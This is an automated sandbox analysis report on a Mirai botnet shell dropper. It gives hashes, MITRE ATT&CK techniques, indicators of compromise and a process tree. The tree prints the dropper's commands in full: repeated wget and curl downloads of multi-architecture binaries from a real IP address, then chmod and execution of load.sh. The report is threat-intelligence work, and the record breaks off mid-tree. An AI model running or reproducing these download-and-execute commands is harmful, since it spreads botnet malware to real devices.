mirai | 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c

Analysis

max time kernel
149s
max time network
153s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
18/10/2024, 01:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh
Size

4KB
MD5

80299ebce287b053ec82cff873ddf3b4
SHA1

1cf8df1f0b5e0903ac1a103e4acee85a5f0d6e00
SHA256

220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c
SHA512

0f48a97903275e97c681719d763775f5a3817b7d1c40ef475d9e444b1fea5d2f1036237b676ff2d22446f80a9ee882d7f738dbd1f17d8c677082d0a63ffc86f6
SSDEEP

96:vNVjNNw4gNx/5NN7lNdMdEpFyNn9/NUssN2mmNRfpN3tnNue2NySqNGWeNPl0:YO4Fs

Score

10^/10

mirai unstable botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

UNSTABLE

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Contacts a large (211384) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 14 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1548	chmod
1554	chmod
1584	chmod
1518	chmod
1524	chmod
1536	chmod
1578	chmod
1505	chmod
1530	chmod
1589	chmod
1560	chmod
1566	chmod
1493	chmod
1511	chmod

Executes dropped EXE 14 IoCs

ioc	pid	Process
/tmp/load.sh	1494	load.sh
/tmp/load.sh	1506	load.sh
/tmp/load.sh	1512	load.sh
/tmp/load.sh	1519	load.sh
/tmp/load.sh	1525	load.sh
/tmp/load.sh	1531	load.sh
/tmp/load.sh	1537	load.sh
/tmp/load.sh	1549	load.sh
/tmp/load.sh	1555	load.sh
/tmp/load.sh	1561	load.sh
/tmp/load.sh	1567	load.sh
/tmp/load.sh	1579	load.sh
/tmp/load.sh	1585	load.sh
/tmp/load.sh	1590	load.sh

Modifies Watchdog functionality 1 TTPs 4 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	load.sh
File opened for modification	/dev/misc/watchdog	load.sh
File opened for modification	/dev/watchdog	load.sh
File opened for modification	/dev/misc/watchdog	load.sh

Enumerates active TCP sockets 1 TTPs 1 IoCs

Gets active TCP sockets from /proc virtual filesystem.

discovery

System Network Connections Discovery

T1049

description	ioc	Process
File opened for reading	/proc/net/tcp	load.sh

Enumerates running processes
Discovers information about currently running processes on the system

Writes file to system bin folder 4 IoCs

description	ioc	Process
File opened for modification	/bin/watchdog	load.sh
File opened for modification	/sbin/watchdog	load.sh
File opened for modification	/bin/watchdog	load.sh
File opened for modification	/sbin/watchdog	load.sh

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/fstream-1.dat	upx
behavioral1/files/fstream-4.dat	upx
behavioral1/files/fstream-5.dat	upx
behavioral1/files/fstream-6.dat	upx
behavioral1/files/fstream-7.dat	upx

Changes its process name 2 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	a	1494	load.sh
Changes the process name, possibly in an attempt to hide itself	a	1567	load.sh

Reads system network configuration 1 TTPs 1 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/tcp	load.sh

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/443/cmdline	load.sh
File opened for reading	/proc/659/cmdline	load.sh
File opened for reading	/proc/1608/cmdline	load.sh
File opened for reading	/proc/453/cmdline	load.sh
File opened for reading	/proc/438/cmdline	load.sh
File opened for reading	/proc/444/cmdline	load.sh
File opened for reading	/proc/510/cmdline	load.sh
File opened for reading	/proc/1067/cmdline	load.sh
File opened for reading	/proc/1471/cmdline	load.sh
File opened for reading	/proc/1111/cmdline	load.sh
File opened for reading	/proc/1140/cmdline	load.sh
File opened for reading	/proc/471/cmdline	load.sh
File opened for reading	/proc/1174/cmdline	load.sh
File opened for reading	/proc/1152/cmdline	load.sh
File opened for reading	/proc/451/cmdline	load.sh
File opened for reading	/proc/1087/cmdline	load.sh
File opened for reading	/proc/1150/cmdline	load.sh
File opened for reading	/proc/1573/cmdline	load.sh
File opened for reading	/proc/1276/cmdline	load.sh
File opened for reading	/proc/1312/cmdline	load.sh
File opened for reading	/proc/1602/cmdline	load.sh
File opened for reading	/proc/1115/cmdline	load.sh
File opened for reading	/proc/700/cmdline	load.sh
File opened for reading	/proc/531/cmdline	load.sh
File opened for reading	/proc/1275/cmdline	load.sh
File opened for reading	/proc/1177/cmdline	load.sh
File opened for reading	/proc/945/cmdline	load.sh
File opened for reading	/proc/1136/cmdline	load.sh
File opened for reading	/proc/1159/cmdline	load.sh
File opened for reading	/proc/1174/cmdline	load.sh
File opened for reading	/proc/1501/cmdline	load.sh
File opened for reading	/proc/535/cmdline	load.sh
File opened for reading	/proc/586/cmdline	load.sh
File opened for reading	/proc/1037/cmdline	load.sh
File opened for reading	/proc/1054/cmdline	load.sh
File opened for reading	/proc/1500/cmdline	load.sh
File opened for reading	/proc/1594/cmdline	load.sh
File opened for reading	/proc/1137/cmdline	load.sh
File opened for reading	/proc/1067/cmdline	load.sh
File opened for reading	/proc/1142/cmdline	load.sh
File opened for reading	/proc/442/cmdline	load.sh
File opened for reading	/proc/851/cmdline	load.sh
File opened for reading	/proc/1229/cmdline	load.sh
File opened for reading	/proc/1620/cmdline	load.sh
File opened for reading	/proc/1054/cmdline	load.sh
File opened for reading	/proc/1159/cmdline	load.sh
File opened for reading	/proc/1482/cmdline	load.sh
File opened for reading	/proc/851/cmdline	load.sh
File opened for reading	/proc/916/cmdline	load.sh
File opened for reading	/proc/1056/cmdline	load.sh
File opened for reading	/proc/1007/cmdline	load.sh
File opened for reading	/proc/1284/cmdline	load.sh
File opened for reading	/proc/1229/cmdline	load.sh
File opened for reading	/proc/1059/cmdline	load.sh
File opened for reading	/proc/958/cmdline	load.sh
File opened for reading	/proc/1165/cmdline	load.sh
File opened for reading	/proc/425/cmdline	load.sh
File opened for reading	/proc/916/cmdline	load.sh
File opened for reading	/proc/588/cmdline	load.sh
File opened for reading	/proc/1002/cmdline	load.sh
File opened for reading	/proc/1087/cmdline	load.sh
File opened for reading	/proc/1106/cmdline	load.sh
File opened for reading	/proc/1475/cmdline	load.sh
File opened for reading	/proc/1136/cmdline	load.sh

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1496	wget
1503	curl
1504	cat

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.arm6	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86	wget
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.mips	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.arm5	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.arm	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.arm5	wget
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.arm7	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.ppc	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.i686	wget
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.sh4	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86	curl
File opened for modification	/tmp/load.sh	220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.mips	wget
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.mpsl	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.ppc	wget
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.i686	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.mpsl	wget
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.spc	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.sh4	wget
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.arm	wget
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.arm6	wget
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.arm7	wget
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.m68k	wget
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86_64	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.m68k	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.spc	wget
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.arc	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.arc	wget

/tmp/220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh
/tmp/220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh
1⤵
- Writes file to tmp directory
PID:1478
- /usr/bin/wget
  wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86
  2⤵
  - Writes file to tmp directory
  PID:1481
- /usr/bin/curl
  curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86
  2⤵
  - Writes file to tmp directory
  PID:1491
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.x86
  2⤵
  PID:1492
- /bin/chmod
  chmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk1
  2⤵
  - File and Directory Permissions Modification
  PID:1493
- /tmp/load.sh
  ./load.sh thinkphp.exploit
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Changes its process name
  - Reads runtime system information
  PID:1494
- /usr/bin/wget
  wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1496
- /usr/bin/curl
  curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1503
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.mips
  2⤵
  - System Network Configuration Discovery
  PID:1504
- /bin/chmod
  chmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk1
  2⤵
  - File and Directory Permissions Modification
  PID:1505
- /tmp/load.sh
  ./load.sh thinkphp.exploit
  2⤵
  - Executes dropped EXE
  PID:1506
- /usr/bin/wget
  wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1508
- /usr/bin/curl
  curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1509
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.mpsl
  2⤵
  PID:1510
- /bin/chmod
  chmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk1
  2⤵
  - File and Directory Permissions Modification
  PID:1511
- /tmp/load.sh
  ./load.sh thinkphp.exploit
  2⤵
  - Executes dropped EXE
  PID:1512
- /usr/bin/wget
  wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm
  2⤵
  - Writes file to tmp directory
  PID:1514
- /usr/bin/curl
  curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm
  2⤵
  - Writes file to tmp directory
  PID:1516
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.arm
  2⤵
  PID:1517
- /bin/chmod
  chmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk1
  2⤵
  - File and Directory Permissions Modification
  PID:1518
- /tmp/load.sh
  ./load.sh thinkphp.exploit
  2⤵
  - Executes dropped EXE
  PID:1519
- /usr/bin/wget
  wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5
  2⤵
  - Writes file to tmp directory
  PID:1521
- /usr/bin/curl
  curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5
  2⤵
  - Writes file to tmp directory
  PID:1522
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.arm5
  2⤵
  PID:1523
- /bin/chmod
  chmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk1
  2⤵
  - File and Directory Permissions Modification
  PID:1524
- /tmp/load.sh
  ./load.sh thinkphp.exploit
  2⤵
  - Executes dropped EXE
  PID:1525
- /usr/bin/wget
  wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm6
  2⤵
  - Writes file to tmp directory
  PID:1527
- /usr/bin/curl
  curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm6
  2⤵
  - Writes file to tmp directory
  PID:1528
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.arm6
  2⤵
  PID:1529
- /bin/chmod
  chmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk1
  2⤵
  - File and Directory Permissions Modification
  PID:1530
- /tmp/load.sh
  ./load.sh thinkphp.exploit
  2⤵
  - Executes dropped EXE
  PID:1531
- /usr/bin/wget
  wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm7
  2⤵
  - Writes file to tmp directory
  PID:1533
- /usr/bin/curl
  curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm7
  2⤵
  - Writes file to tmp directory
  PID:1534
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.arm7
  2⤵
  PID:1535
- /bin/chmod
  chmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.arm7 db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk1
  2⤵
  - File and Directory Permissions Modification
  PID:1536
- /tmp/load.sh
  ./load.sh thinkphp.exploit
  2⤵
  - Executes dropped EXE
  PID:1537
- /usr/bin/wget
  wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppc
  2⤵
  - Writes file to tmp directory
  PID:1539
- /usr/bin/curl
  curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppc
  2⤵
  - Writes file to tmp directory
  PID:1546
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.ppc
  2⤵
  PID:1547
- /bin/chmod
  chmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.arm7 db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.ppc db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-Lt40RB systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk1
  2⤵
  - File and Directory Permissions Modification
  PID:1548
- /tmp/load.sh
  ./load.sh thinkphp.exploit
  2⤵
  - Executes dropped EXE
  PID:1549
- /usr/bin/wget
  wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.m68k
  2⤵
  - Writes file to tmp directory
  PID:1551
- /usr/bin/curl
  curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.m68k
  2⤵
  - Writes file to tmp directory
  PID:1552
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.m68k
  2⤵
  PID:1553
- /bin/chmod
  chmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.arm7 db0fa4b8db0333367e9bda3ab68b8042.m68k db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.ppc db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-Lt40RB systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk1
  2⤵
  - File and Directory Permissions Modification
  PID:1554
- /tmp/load.sh
  ./load.sh thinkphp.exploit
  2⤵
  - Executes dropped EXE
  PID:1555
- /usr/bin/wget
  wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.spc
  2⤵
  - Writes file to tmp directory
  PID:1557
- /usr/bin/curl
  curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.spc
  2⤵
  - Writes file to tmp directory
  PID:1558
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.spc
  2⤵
  PID:1559
- /bin/chmod
  chmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.arm7 db0fa4b8db0333367e9bda3ab68b8042.m68k db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.ppc db0fa4b8db0333367e9bda3ab68b8042.spc db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-Lt40RB systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk1
  2⤵
  - File and Directory Permissions Modification
  PID:1560
- /tmp/load.sh
  ./load.sh thinkphp.exploit
  2⤵
  - Executes dropped EXE
  PID:1561
- /usr/bin/wget
  wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.i686
  2⤵
  - Writes file to tmp directory
  PID:1563
- /usr/bin/curl
  curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.i686
  2⤵
  - Writes file to tmp directory
  PID:1564
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.i686
  2⤵
  PID:1565
- /bin/chmod
  chmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.arm7 db0fa4b8db0333367e9bda3ab68b8042.i686 db0fa4b8db0333367e9bda3ab68b8042.m68k db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.ppc db0fa4b8db0333367e9bda3ab68b8042.spc db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-Lt40RB systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk1
  2⤵
  - File and Directory Permissions Modification
  PID:1566
- /tmp/load.sh
  ./load.sh thinkphp.exploit
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:1567
- /usr/bin/wget
  wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.sh4
  2⤵
  - Writes file to tmp directory
  PID:1569
- /usr/bin/curl
  curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.sh4
  2⤵
  - Writes file to tmp directory
  PID:1576
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.sh4
  2⤵
  PID:1577
- /bin/chmod
  chmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.arm7 db0fa4b8db0333367e9bda3ab68b8042.i686 db0fa4b8db0333367e9bda3ab68b8042.m68k db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.ppc db0fa4b8db0333367e9bda3ab68b8042.sh4 db0fa4b8db0333367e9bda3ab68b8042.spc db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-Lt40RB systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk1
  2⤵
  - File and Directory Permissions Modification
  PID:1578
- /tmp/load.sh
  ./load.sh thinkphp.exploit
  2⤵
  - Executes dropped EXE
  PID:1579
- /usr/bin/wget
